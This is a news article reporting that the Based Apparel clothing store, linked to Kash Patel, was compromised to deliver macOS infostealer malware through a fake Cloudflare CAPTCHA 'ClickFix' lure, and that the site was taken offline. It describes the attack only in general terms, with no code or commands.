An online clothing store affiliated with FBI Director Kash Patel was taken offline on Friday following the discovery that it was facilitating the spread of an Infostealer malware to its visitors. The site, known as Based Apparel, had been compromised by hackers who targeted macOS users, tricking them into downloading malicious software designed to steal sensitive information.
Understanding the ClickFix Attack
The attack was executed using a method termed a ClickFix attack. When users accessed BasedApparel.com, they were confronted with a counterfeit warning page that mimicked the interface of Cloudflare, a recognized internet security provider known for its anti-bot verification systems. This imitation page falsely claimed that unusual web traffic had been detected and prompted users to complete a CAPTCHA verification test.
To mislead visitors, the fraudulent site offered unusual instructions that directed users to open Terminal, a built-in macOS utility utilized for executing system commands. The site provided a button labeled “Copy,” suggesting it would copy a simple message indicating that the user was not a robot. In reality, this button copied a lengthy and obfuscated string of code. Users were then instructed to paste the copied text into Terminal, which, when executed, launched a shell script connecting to the hackers’ command and control (C2) servers. This malicious script was engineered to extract cryptocurrency assets from digital wallets and pilfer sensitive session tokens and browser information.
Incident Discovery and Website Status
The cyberattack was initially recognized by a user in Portugal, who first reported it on Thursday. Cybersecurity researchers later successfully replicated the attack on a MacBook while browsing the site using Chrome. By Friday, BasedApparel.com was entirely offline, replaced by a message indicating that the service would soon resume operations.
While the extent of data loss among visitors remains uncertain, traffic records from Ahrefs indicated that the store, co-founded by Kash Patel and Andrew Ollis prior to Patel’s appointment as FBI Director, garners approximately 33,600 monthly visits. As of this writing, the website had been reestablished but displayed a single-page message stating: “We’ll Be Right Back. We’re making improvements to better serve you. The store will be back online shortly – bolder than ever. Back Soon, Stay Based.”
This incident marks another instance of Kash Patel’s appearance in the cybersecurity narrative. Last month, the Handala hacker group, linked to Iran, compromised Patel’s personal Gmail account, leaking private photos and documents. For individuals who may have visited the compromised site, it is prudent to conduct a thorough scan of their devices for infostealer malware.